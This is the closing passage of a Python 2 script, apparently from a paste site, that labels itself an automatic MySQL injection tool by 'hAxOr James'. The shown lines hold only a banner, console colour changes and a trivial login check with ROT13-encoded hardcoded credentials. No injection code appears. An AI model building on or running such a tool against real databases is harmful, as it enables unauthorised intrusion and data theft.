  816.     print (" ::~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~::")
  817.     print (" ::                           | Coded By hAxOr James* |             ::")
  818.     print (" ::                       | Security Is Just An ILLUSION |          ::")
  819.     print (" ::     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ::")
  820.     print (" ::                             *****                               ::")
  821.     print (" :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::")
  822.     time.sleep(1)
  823.     os.system("color B")
  824.     time.sleep(.8)
  825.     os.system("color A")
  826.     time.sleep(.8)
  827.     os.system("color C")
  828.     print "\n\n"
  829.     time.sleep(1)
  830.     print "Script Loaded !\nStarting All Functions..\n"
  831.     time.sleep(.8)
  832.     print "  Done! \n\n                          Let's Start !"
  833.     print "----------------------------------------------------------"
  834.     time.sleep(1.2)
  835.     typex()    
  836.  
  837. def acc1():
  838.         os.system("cls")
  839.         time.sleep(1)
  840.         os.system("title      -      Advanced Automatic MySQL Injection Tool     ::   Coded By James   ::")
  841.         usx = 'hfre'
  842.         psx = 'cnff'
  843.         print "\n       ###        Please Login To Continue          ###\n" + "-"*55
  844.         pol = raw_input("  Enter Your Username : ")
  845.         pol1 = raw_input("  Enter Your Password : ")
  846.         if(pol != usx):
  847.             print "Username is Incorrect!"
  848.             time.sleep(1)
  849.             sys.exit(0)
  850.         if(pol1 != psx):
  851.             print "Password is Incorrect!"
  852.             time.sleep(1)
  853.             sys.exit(0)
  854.         acc()
  855.  
  856. intro()
  857.  
  858.  
  859. input("")
  860.  
  861.  
  862.  
  863. # ---- hAxOr James*  =)
Add Comment
Please, Sign In to add comment